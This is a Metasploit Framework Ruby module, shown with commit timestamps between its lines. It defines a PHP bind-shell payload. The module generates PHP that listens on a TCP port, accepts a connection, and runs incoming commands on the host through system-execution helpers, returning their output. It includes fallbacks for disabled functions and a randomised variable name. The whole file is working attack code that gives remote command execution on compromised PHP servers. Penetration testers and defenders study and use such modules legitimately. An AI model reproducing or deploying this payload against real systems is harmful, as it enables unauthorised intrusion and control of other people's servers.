2007-02-18 00:10:39 +00:00
|
|
|
##
|
2010-02-24 01:19:59 +00:00
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2007-02-18 00:10:39 +00:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
2006-12-18 22:06:19 +00:00
|
|
|
require 'msf/core'
|
2008-07-01 01:44:56 +00:00
|
|
|
require 'msf/core/payload/php'
|
2006-12-18 22:06:19 +00:00
|
|
|
require 'msf/core/handler/bind_tcp'
|
|
|
|
require 'msf/base/sessions/command_shell'
|
2010-02-24 01:19:59 +00:00
|
|
|
require 'msf/base/sessions/command_shell_options'
|
2006-12-18 22:06:19 +00:00
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
module Metasploit3
|
2006-12-18 22:06:19 +00:00
|
|
|
|
|
|
|
include Msf::Payload::Single
|
2008-07-01 01:44:56 +00:00
|
|
|
include Msf::Payload::Php
|
2010-02-24 01:19:59 +00:00
|
|
|
include Msf::Sessions::CommandShellOptions
|
2006-12-18 22:06:19 +00:00
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(merge_info(info,
|
2012-08-07 20:59:01 +00:00
|
|
|
'Name' => 'PHP Command Shell, Bind TCP (via PHP)',
|
2009-04-18 23:51:20 +00:00
|
|
|
'Description' => 'Listen for a connection and spawn a command shell via php',
|
2008-07-01 01:44:56 +00:00
|
|
|
'Author' => ['egypt', 'diaul <diaul@devilopers.org>',],
|
2006-12-18 22:06:19 +00:00
|
|
|
'License' => BSD_LICENSE,
|
|
|
|
'Platform' => 'php',
|
|
|
|
'Arch' => ARCH_PHP,
|
|
|
|
'Handler' => Msf::Handler::BindTcp,
|
|
|
|
'Session' => Msf::Sessions::CommandShell,
|
|
|
|
'PayloadType' => 'cmd',
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Offsets' => { },
|
|
|
|
'Payload' => ''
|
|
|
|
}
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# PHP Bind Shell
|
|
|
|
#
|
|
|
|
def php_bind_shell
|
|
|
|
|
2008-07-01 01:44:56 +00:00
|
|
|
dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4);
|
|
|
|
shell = <<-END_OF_PHP_CODE
|
|
|
|
#{php_preamble({:disabled_varname => dis})}
|
|
|
|
$port=#{datastore['LPORT']};
|
|
|
|
|
|
|
|
$scl='socket_create_listen';
|
|
|
|
if(is_callable($scl)&&!in_array($scl,#{dis})){
|
2008-09-04 03:52:02 +00:00
|
|
|
$sock=@$scl($port);
|
2008-07-01 01:44:56 +00:00
|
|
|
}else{
|
2008-09-04 03:52:02 +00:00
|
|
|
$sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
|
|
|
|
$ret=@socket_bind($sock,0,$port);
|
|
|
|
$ret=@socket_listen($sock,5);
|
2008-07-01 01:44:56 +00:00
|
|
|
}
|
2008-09-04 03:52:02 +00:00
|
|
|
$msgsock=@socket_accept($sock);
|
|
|
|
@socket_close($sock);
|
2006-12-18 22:06:19 +00:00
|
|
|
|
2008-09-04 03:52:02 +00:00
|
|
|
while(FALSE!==@socket_select($r=array($msgsock), $w=NULL, $e=NULL, NULL))
|
2006-12-18 22:06:19 +00:00
|
|
|
{
|
2009-09-10 06:19:10 +00:00
|
|
|
$o = '';
|
2008-09-04 03:52:02 +00:00
|
|
|
$c=@socket_read($msgsock,2048,PHP_NORMAL_READ);
|
2008-07-01 01:44:56 +00:00
|
|
|
if(FALSE===$c){break;}
|
2009-09-10 06:19:10 +00:00
|
|
|
if(substr($c,0,3) == 'cd '){
|
|
|
|
chdir(substr($c,3,-1));
|
|
|
|
} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
|
|
|
|
break;
|
|
|
|
}else{
|
|
|
|
#{php_system_block({:cmd_varname=>"$c", :output_varname=>"$o", :disabled_varname => dis})}
|
|
|
|
}
|
2008-09-04 03:52:02 +00:00
|
|
|
@socket_write($msgsock,$o,strlen($o));
|
2008-07-01 01:44:56 +00:00
|
|
|
}
|
2008-09-04 03:52:02 +00:00
|
|
|
@socket_close($msgsock);
|
2006-12-18 22:06:19 +00:00
|
|
|
END_OF_PHP_CODE
|
2010-02-24 01:19:59 +00:00
|
|
|
|
2006-12-18 22:06:19 +00:00
|
|
|
return shell
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Constructs the payload
|
|
|
|
#
|
|
|
|
def generate
|
|
|
|
return super + php_bind_shell
|
|
|
|
end
|
|
|
|
|
2009-04-18 23:51:20 +00:00
|
|
|
end
|